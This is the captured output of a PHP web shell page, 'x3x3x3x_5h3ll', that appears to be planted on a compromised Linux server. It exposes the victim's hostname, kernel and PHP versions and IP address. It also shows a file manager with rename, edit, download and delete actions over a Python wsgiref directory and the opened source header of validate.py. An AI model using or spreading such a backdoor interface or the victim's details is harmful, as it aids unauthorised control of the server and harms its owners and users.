x3x3x3x_5h3ll
— 53cur3 — 5h3ll_1d —
Linux vps-10654784.cedaps.org.br 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
  INFO SERVER : Apache PHP : 7.4.33
/opt/alt/python311/lib64/python3.11/wsgiref/
162.240.100.168

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACTN ]
+FILE +DIR
__pycache__ dir drwxr-xr-x 2024-06-09 22:18 R D
__init__.py 0.642 KB -rw-r--r-- 2024-04-02 08:25 R E G D
handlers.py 21.045 KB -rw-r--r-- 2024-04-02 08:25 R E G D
headers.py 6.607 KB -rw-r--r-- 2024-04-02 08:25 R E G D
simple_server.py 5.05 KB -rw-r--r-- 2024-04-02 08:25 R E G D
types.py 1.677 KB -rw-r--r-- 2024-04-02 08:25 R E G D
util.py 5.344 KB -rw-r--r-- 2024-04-02 08:25 R E G D
validate.py 14.743 KB -rw-r--r-- 2024-04-02 08:25 R E G D
REQUEST EXIT
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org) # Licensed under the MIT license: https://opensource.org/licenses/mit-license.php # Also licenced under the Apache License, 2.0: https://opensource.org/licenses/apache2.0.php # Licensed to PSF under a Contributor Agreement """ Middleware to check for obedience to the WSGI specification. Some of the things this checks: * Signature of the application and start_response (including that keyword arguments are not used). * Environment checks: - Environment is a dictionary (and not a subclass). - That all the required keys are in the environment: REQUEST_METHOD, SERVER_NAME, SERVER_PORT, wsgi.version, wsgi.input, wsgi.errors, wsgi.multithread, wsgi.multiprocess, wsgi.run_once - That HTTP_CONTENT_TYPE and HTTP_CONTENT_LENGTH are not in the environment (these headers should appear as CONTENT_LENGTH and CONTENT_TYPE). - Warns if QUERY_STRING is missing, as the cgi module acts unpredictably in that case. - That CGI-style variables (that don't contain a .) have (non-unicode) string values - That wsgi.version is a tuple